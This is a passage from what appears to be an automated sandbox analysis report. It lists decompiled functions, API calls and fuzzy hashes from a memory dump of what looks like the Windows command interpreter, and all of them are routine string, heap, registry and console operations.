                                              0x002a6713
                                              0x002a6717
                                              0x002a671f
                                              0x002a6727
                                              0x002a6727
                                              0x00000000

                                              APIs
                                                • Part of subcall function 002A6785: iswdigit.MSVCRT ref: 002A67A5
                                                • Part of subcall function 002A6785: wcschr.MSVCRT ref: 002A67B6
                                                • Part of subcall function 002A6785: wcschr.MSVCRT ref: 002A67C9
                                                • Part of subcall function 002A6785: wcschr.MSVCRT ref: 002A67ED
                                                • Part of subcall function 002A6785: wcschr.MSVCRT ref: 002A6804
                                              • wcschr.MSVCRT ref: 002A675C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: wcschr$iswdigit
                                              • String ID: <>+-*/%()|^&=,$wc*$wc*
                                              • API String ID: 2770779731-1813605204
                                              • Opcode ID: 3cfb7cf46ffdd9c78268431109216c9fff661e3fb80594ea10e4da5e10c18711
                                              • Instruction ID: dbec979e6bfccff5bfe6089743f3ec81f63f465c3500538ffe18f71676ce7ba4
                                              • Opcode Fuzzy Hash: 3cfb7cf46ffdd9c78268431109216c9fff661e3fb80594ea10e4da5e10c18711
                                              • Instruction Fuzzy Hash: 18416C7292010AABCF11EF24D8499EFB765EF06364F188115FC156B240EB71AF65CBD0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B62FA, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _wcsnicmp
                                              • String ID: /-Y$COPYCMD
                                              • API String ID: 1886669725-617350906
                                              • Opcode ID: 5d536651607e1b6ffe0103a84146003d42ace25911c3adeaf883a7ef56fee008
                                              • Instruction ID: 0df1054bc2831cebd649a4a6f7cd10c95c40a6fe000cc20d1fa8eb3e47305317
                                              • Opcode Fuzzy Hash: 5d536651607e1b6ffe0103a84146003d42ace25911c3adeaf883a7ef56fee008
                                              • Instruction Fuzzy Hash: CA218E72E2021297CB289F1A9C4D6FAB7E9EF957D0B5400E9FC4997240FF749D61C250
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002CAB79, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 72%
                                              			E002CAB79(void* __ecx, char* __edx, signed char* _a4) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				char* _v552;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t25;
				void* _t39;
				char _t42;
				void* _t44;
				intOrPtr _t47;
				void* _t59;
				signed int _t61;

				_t58 = __edx;
				_t25 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t25 ^ _t61;
				_v28 = _v28 & 0x00000000;
				_t60 = 0x104;
				_v552 = __edx;
				_v20 = 0x104;
				_t46 = 1;
				_t59 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E002B0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t37 = _a4;
					_t60 = L"%s";
					if(( *_a4 & 0x00000010) != 0) {
						_t60 = L"[%s]";
					}
					_t39 = E002B0D89(_t58, _t37 + 0x2c);
					_t54 = _v28;
					if(_v28 == 0) {
						_t54 =  &_v548;
					}
					_t47 = _v552;
					E002B6810(_t39, _t54, _t47);
					if(_t47 < 0) {
						_t44 = _v28;
						if(_t44 == 0) {
							_t44 =  &_v548;
						}
						__imp___wcslwr(_t44);
					}
					_t41 = _v28;
					if(_v28 == 0) {
						_t41 =  &_v548;
					}
					_t58 = _t60;
					_t42 = E002B6B76(_t59, _t60, _t41);
					_t46 = _t42;
					if(_t42 == 0) {
						_t46 = E002C7D7D(_t59);
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E002B6FD0(_t46, _t46, _v8 ^ _t61, _t58, _t59, _t60, _v28);
			}




















                                              0x002cab79
                                              0x002cab84
                                              0x002cab8b
                                              0x002cab8e
                                              0x002cab9b
                                              0x002caba0
                                              0x002caba9
                                              0x002cabae
                                              0x002cabaf
                                              0x002cabb2
                                              0x002cabb5
                                              0x002cabdb
                                              0x002cabdd
                                              0x002cabe0
                                              0x002cabe8
                                              0x002cabea
                                              0x002cabea
                                              0x002cabf9
                                              0x002cabfe
                                              0x002cac03
                                              0x002cac05
                                              0x002cac05
                                              0x002cac0b
                                              0x002cac12
                                              0x002cac19
                                              0x002cac1b
                                              0x002cac20
                                              0x002cac22
                                              0x002cac22
                                              0x002cac29
                                              0x002cac2f
                                              0x002cac30
                                              0x002cac35
                                              0x002cac37
                                              0x002cac37
                                              0x002cac3e
                                              0x002cac42
                                              0x002cac47
                                              0x002cac4b
                                              0x002cac54
                                              0x002cac54
                                              0x002cac4b
                                              0x002cac59
                                              0x002cac72

                                              APIs
                                              • memset.MSVCRT ref: 002CABB5
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • _wcslwr.MSVCRT ref: 002CAC29
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002CAC59
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$_wcslwr
                                              • String ID: [%s]
                                              • API String ID: 886762496-302437576
                                              • Opcode ID: 11073ebe0329a3c03c426529d9cfae83f2d1c4a95fbaa06d07d59528b6018d90
                                              • Instruction ID: 62cae7c084af1e3d44c3937f5445854503b239805d6947c61b3a9af3dad48176
                                              • Opcode Fuzzy Hash: 11073ebe0329a3c03c426529d9cfae83f2d1c4a95fbaa06d07d59528b6018d90
                                              • Instruction Fuzzy Hash: B3219371A1021D5BDB14DBA4ECC9FFEBBB8AB18344F0401AEA909D3141EA74DE54CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B23A9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 002B2430: iswspace.MSVCRT ref: 002B2440
                                              • iswspace.MSVCRT ref: 002B23C8
                                              • _wcsnicmp.MSVCRT ref: 002B2419
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: iswspace$_wcsnicmp
                                              • String ID: off
                                              • API String ID: 3989682491-733764931
                                              • Opcode ID: d14e3de2b0f484072228bbe496480b6e86f06d2e47e95acd0bed0496eb62b61c
                                              • Instruction ID: 2e63634e100175082e6d4b50855a4582033c234b1e680736472a5ba2980526a9
                                              • Opcode Fuzzy Hash: d14e3de2b0f484072228bbe496480b6e86f06d2e47e95acd0bed0496eb62b61c
                                              • Instruction Fuzzy Hash: 13114862630313D7DA352B2A7C8BAFA12A4CB81BD5B64006AFC46E64C0EE448DBD9171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C4506, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 002B7721: __iob_func.MSVCRT ref: 002B7726
                                              • fprintf.MSVCRT ref: 002C4522
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: __iob_funcfprintf
                                              • String ID: CMD Internal Error %s$%s$Null environment
                                              • API String ID: 620453056-2781220306
                                              • Opcode ID: 28cbe5b4d600973fd9416f4e352ecde88004d202f1ec559caa0b98aa82ebbdd3
                                              • Instruction ID: 67e3e3186c6abd0ff8bd582c6418f09bcb6b96d696ec066f0ecc642532a3e6aa
                                              • Opcode Fuzzy Hash: 28cbe5b4d600973fd9416f4e352ecde88004d202f1ec559caa0b98aa82ebbdd3
                                              • Instruction Fuzzy Hash: ED0147379742128FC734BE5C7866EA3B354DAF1390395063FEC5A93284FEA05D628140
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C2950, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 002C2979
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 002C298A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: RtlDllShutdownInProgress$ntdll.dll
                                              • API String ID: 1646373207-582119455
                                              • Opcode ID: a268729ff1081a9924774f151b7b6e6e93ae93f5c3f0fb7f9e31b0b70790e76f
                                              • Instruction ID: a6e6c88f379ef59c3b1b3f6c9643c0be267f05ccec09891f67b2d018fe1eeee3
                                              • Opcode Fuzzy Hash: a268729ff1081a9924774f151b7b6e6e93ae93f5c3f0fb7f9e31b0b70790e76f
                                              • Instruction Fuzzy Hash: F7F09631AB0319DB4B109F28BD4DF6A77E8EB45754751025EF809DB210DF715D158A81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A88D8, Relevance: 6.2, APIs: 4, Instructions: 184COMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 002A8991
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002A8AAB
                                                • Part of subcall function 002B36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,002A590A,00000000), ref: 002B36F0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$CurrentDirectory
                                              • String ID:
                                              • API String ID: 168429351-0
                                              • Opcode ID: 0e51fcbc70c6ab2652d2600ec8bd9e818ea6124d4608e8fe36ed64a87c272e50
                                              • Instruction ID: dcd05fca4b74358a7de957c85030c8731e98f80762ea9d67a4fedf4df953820a
                                              • Opcode Fuzzy Hash: 0e51fcbc70c6ab2652d2600ec8bd9e818ea6124d4608e8fe36ed64a87c272e50
                                              • Instruction Fuzzy Hash: 7F615771A28342DFD328DF29D885A6BB7E5BFC9310F104A2EF599C3251DB709924CB46
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A5F75, Relevance: 6.2, APIs: 4, Instructions: 183COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _wcsnicmp$wcschr
                                              • String ID:
                                              • API String ID: 3270668897-0
                                              • Opcode ID: cbb7859219fed9e951142e165d995b2bd40cd0af3384826cde107b1b5bd76961
                                              • Instruction ID: b73757a43451ad77327e9f4f3007108bc67e6b6a638f8e4cfdece28a00f3d105
                                              • Opcode Fuzzy Hash: cbb7859219fed9e951142e165d995b2bd40cd0af3384826cde107b1b5bd76961
                                              • Instruction Fuzzy Hash: CC51AE356206129BCB24EF2498656BF73A0FF417C0B69446EE8439B2C1EF714EE2D691
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AAF70, Relevance: 6.2, APIs: 4, Instructions: 179COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 002B00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000), ref: 002B00C1
                                                • Part of subcall function 002B00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000,?), ref: 002B00C8
                                              • _pipe.MSVCRT ref: 002AAF9F
                                                • Part of subcall function 002ADBCE: _dup.MSVCRT ref: 002ADBD5
                                              • longjmp.MSVCRT(002DB8B8,00000001), ref: 002C12F1
                                                • Part of subcall function 002ADBFC: _dup2.MSVCRT ref: 002ADC10
                                                • Part of subcall function 002ADB92: _close.MSVCRT ref: 002ADBC1
                                              • _get_osfhandle.MSVCRT ref: 002AB047
                                              • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 002AB055
                                                • Part of subcall function 002AE040: memset.MSVCRT ref: 002AE090
                                                • Part of subcall function 002AE040: wcschr.MSVCRT ref: 002AE0F3
                                                • Part of subcall function 002AE040: wcschr.MSVCRT ref: 002AE10B
                                                • Part of subcall function 002AE040: _wcsicmp.MSVCRT ref: 002AE179
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                              • String ID:
                                              • API String ID: 1441200171-0
                                              • Opcode ID: 2b9c88300607db88c31a826b2a33c4808946aa6c2c60768e445a841fce18ed9d
                                              • Instruction ID: c441053f8c6486edccb81117b0f02332bcd0e8d339ab57303053f0659c2d238c
                                              • Opcode Fuzzy Hash: 2b9c88300607db88c31a826b2a33c4808946aa6c2c60768e445a841fce18ed9d
                                              • Instruction Fuzzy Hash: 505196355207019FD725DF29E856B2673E1EB86324F108A2EE46BC76D2EF30A861CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B02B0, Relevance: 6.2, APIs: 4, Instructions: 165COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: iswdigit
                                              • String ID:
                                              • API String ID: 3849470556-0
                                              • Opcode ID: e80ee6f90524760b5eb8d89d306b90577f0304c902e019a9eded11c2fdcd6a66
                                              • Instruction ID: c5c2f037a4c4a7c24a78a7d44d048b165459dba161fb39fa92ff1601c4322ed8
                                              • Opcode Fuzzy Hash: e80ee6f90524760b5eb8d89d306b90577f0304c902e019a9eded11c2fdcd6a66
                                              • Instruction Fuzzy Hash: 3851E2709212059BCB15DF65C9D82BFB7B0FB80380F2480AAD9028B351EB71DDA1CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B2D22, Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,002B3C29,?,00000000,-00000001,00000000,?,00000000), ref: 002B2D87
                                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,002B3C29,?,00000000,-00000001,00000000,?,00000000), ref: 002B2D91
                                              • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,002B3C29,?,00000000,-00000001,00000000,?,00000000), ref: 002B2DA4
                                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002B3C29,?,00000000,-00000001,00000000,?,00000000), ref: 002B2DAE
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ErrorMode$FullNamePath
                                              • String ID:
                                              • API String ID: 268959451-0
                                              • Opcode ID: ea9274274437be944b1d6897420813887781e1194771ec110f55e7cd8c070e8f
                                              • Instruction ID: bb905a36c9b71580b3c039586c0d3532bddda948f7e52eafdb1b26c354381892
                                              • Opcode Fuzzy Hash: ea9274274437be944b1d6897420813887781e1194771ec110f55e7cd8c070e8f
                                              • Instruction Fuzzy Hash: D0414035110202EBCB28DF68C8959FFB379EF84744754851EED06CB250E771AEA5C750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AEEF0, Relevance: 6.1, APIs: 4, Instructions: 94memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,002AE5F6,?,00000000,00000000,00000000), ref: 002AEF39
                                              • RtlFreeHeap.NTDLL(00000000,?,002AE5F6), ref: 002AEF40
                                              • _setjmp3.MSVCRT ref: 002AEFA5
                                              • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,00000000,00008000,00000000,00000000,00000000,?,002AE5F6,?,00000000,00000000,00000000), ref: 002AF00D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: FreeHeap$ProcessVirtual_setjmp3
                                              • String ID:
                                              • API String ID: 2613391085-0
                                              • Opcode ID: ed40d91a72ef66e9b8624f803fbd3b00386162a822bef2e586c36180a5e74e8f
                                              • Instruction ID: 1643caa7675aaf40bd65185c6104c762a78633e8ebb90728f6c999192b8520fe
                                              • Opcode Fuzzy Hash: ed40d91a72ef66e9b8624f803fbd3b00386162a822bef2e586c36180a5e74e8f
                                              • Instruction Fuzzy Hash: 6431CDB1A212919FDB10AF29BC4DB26BBA8EB46740F26402BE809CB650DF70CC518B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C29B9, Relevance: 6.1, APIs: 4, Instructions: 85memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,?,?,?,?,?,?,?,?,?,?,002C1C4B), ref: 002C2A34
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,002C1C4B), ref: 002C2A3B
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,002C1C4B), ref: 002C2A4D
                                              • RtlFreeHeap.NTDLL(00000000), ref: 002C2A54
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Heap$Process$AllocFree
                                              • String ID:
                                              • API String ID: 756756679-0
                                              • Opcode ID: 6b793af79e9d2e335a88206114f1e9ecd48138f953ef89f2d3a5c688ff44f911
                                              • Instruction ID: 8d2f9892d1e329c8d51afa5a53a30b755fd06ab07783fdfcf2b97f24d3aab5fb
                                              • Opcode Fuzzy Hash: 6b793af79e9d2e335a88206114f1e9ecd48138f953ef89f2d3a5c688ff44f911
                                              • Instruction Fuzzy Hash: 08311675A00605DFCB24EF69D485A5ABBF5FF48310B00866EED4A8B711EB30E955CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B4E94, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 002B00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000), ref: 002B00C1
                                                • Part of subcall function 002B00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000,?), ref: 002B00C8
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,002B2F2C,-00000001,-00000001,-00000001,-00000001), ref: 002B4ED6
                                              • longjmp.MSVCRT(002DB8B8,00000001,?,00000104,00000000,?,?,002B2F2C,-00000001,-00000001,-00000001,-00000001), ref: 002BF016
                                              • _get_osfhandle.MSVCRT ref: 002BF01E
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,002B2F2C,-00000001,-00000001,-00000001,-00000001), ref: 002BF02C
                                                • Part of subcall function 002B0178: _get_osfhandle.MSVCRT ref: 002B0183
                                                • Part of subcall function 002B0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002BD6A1), ref: 002B018D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: BufferConsoleHeapInfoScreen_get_osfhandle$AllocFileProcessTypelongjmp
                                              • String ID:
                                              • API String ID: 1629431960-0
                                              • Opcode ID: 54340d0284ee0528526cc07487d10cf3c6eb4a76788081acbafcae8034df747c
                                              • Instruction ID: 08861343353979d0244df9239331d0d95a78dfa8122cd30c8178b75162a47077
                                              • Opcode Fuzzy Hash: 54340d0284ee0528526cc07487d10cf3c6eb4a76788081acbafcae8034df747c
                                              • Instruction Fuzzy Hash: 2321C271A203059FD720AF75E889BBBB7E8EF14791F14082EE846C7242FA75D8508B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C997C, Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 002C99B8
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(004D0043,-00000209,00000000,00000000,-00000209,?,002A2178,00310030), ref: 002C99FC
                                              • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,002A2178,00310030), ref: 002C9A2E
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002C9A3E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$DriveFullNamePathType
                                              • String ID:
                                              • API String ID: 3442494845-0
                                              • Opcode ID: ae575642bcda2ec7f4bc80a00858ec2a14c4ceeb8435b3c8f5dcfde0b58c2adf
                                              • Instruction ID: 01c511ce519ee2910ce252a32edcfc182e7d8814eefcb41ab70fce4f48a8ab54
                                              • Opcode Fuzzy Hash: ae575642bcda2ec7f4bc80a00858ec2a14c4ceeb8435b3c8f5dcfde0b58c2adf
                                              • Instruction Fuzzy Hash: 9C214F71A1011EABDB11DFE4EC89FBEBBB8EB04344F0401AEE509E6141E634DE948B95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C5662, Relevance: 6.1, APIs: 4, Instructions: 75registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,002CC100,0000001C,002C4C85), ref: 002C5695
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,002CC100,0000001C,002C4C85), ref: 002C56B0
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 002C56EF
                                              • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 002C570C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: QueryValue$ErrorLastOpen
                                              • String ID:
                                              • API String ID: 4270309053-0
                                              • Opcode ID: efc7e3c0a69d5a66ed54c4942e3883c4df480b9920839950675a3d29511d264d
                                              • Instruction ID: 018b6559c357f76d376566907d11ee0c4923c1a2118108af6692e8c16202e85a
                                              • Opcode Fuzzy Hash: efc7e3c0a69d5a66ed54c4942e3883c4df480b9920839950675a3d29511d264d
                                              • Instruction Fuzzy Hash: 36214FB1D6062AEFDB109F959C80EEEB6BCFF48750B54422AF901F6140DB709D949BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A56AE, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5ab7db2fa9a11a256986099ee82204e324cc22ad44deaabcf782f9913a0cf3e6
                                              • Instruction ID: 22b20eb9ea97ff925911a5e53c2a33f056bd022694270e745cdb2ab99139753b
                                              • Opcode Fuzzy Hash: 5ab7db2fa9a11a256986099ee82204e324cc22ad44deaabcf782f9913a0cf3e6
                                              • Instruction Fuzzy Hash: 4411D031220606ABDB299F25AC59BEF376CEB41760F24411AF911871E0DB709DA1CBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002CB91D, Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 002CB953
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 002CB98D
                                              • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 002CB9A5
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002CB9B9
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$DriveNamePathTypeVolume
                                              • String ID:
                                              • API String ID: 1029679093-0
